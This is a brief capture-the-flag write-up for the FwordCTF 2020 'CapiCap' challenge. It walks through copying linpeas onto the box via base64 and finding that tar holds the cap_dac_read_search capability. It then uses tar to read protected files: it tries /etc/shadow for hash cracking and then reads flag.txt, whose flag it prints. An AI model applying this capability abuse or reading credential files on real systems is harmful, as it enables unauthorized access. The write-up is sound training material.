Tags: capabilities

Rating:

# fword-ctf-writeups
Writeup for FWORD 2020 CTF

---
CapiCap
---
This challenge was quit nice, i actually spent a great deal of time just to put linpeas on the box, i ended up converting the linpeas script to base64, then copied and pasted it in the machine using echo (there's probably a better way to do this, but i was too lazy to think of anything else)
so at my attack machine:

cat linpeas.sh | base64 > linpeas.b64

copy the result

on target host:

echo "base64 string" > linenum.b64

cat linpeas.b64 | base64 -d > linpeas.sh

at first time i missed it, so it took me quit some time,

actually the name of the challenge gives us a hint.

running the following:

getcap -r / 2>/dev/null

gives us:

/usr/bin/tar = cap_dac_read_search+ep

this caught my attention as i do not normally see this.

after doing some research, i found out that this actually gives tar premission to read any file!

so i initially tried to read /etc/shadow and crack the hast- that got me nowhere.

it took me a minute to realize i just need the flag.txt file!

so doing this:

cd /tmp #so we will be somewhere with write premissions

tar -cvf flag.tar ~/flag.txt # read the flag file from the home directory, and store it in flag.tar

tar -xvf flag.tar # extract the flag file

now we can:

cat /tmp/home/user1/flag.txt

FwordCTF{C4pAbiLities_4r3_t00_S3Cur3_NaruT0_0nc3_S4id}

and we got the flag!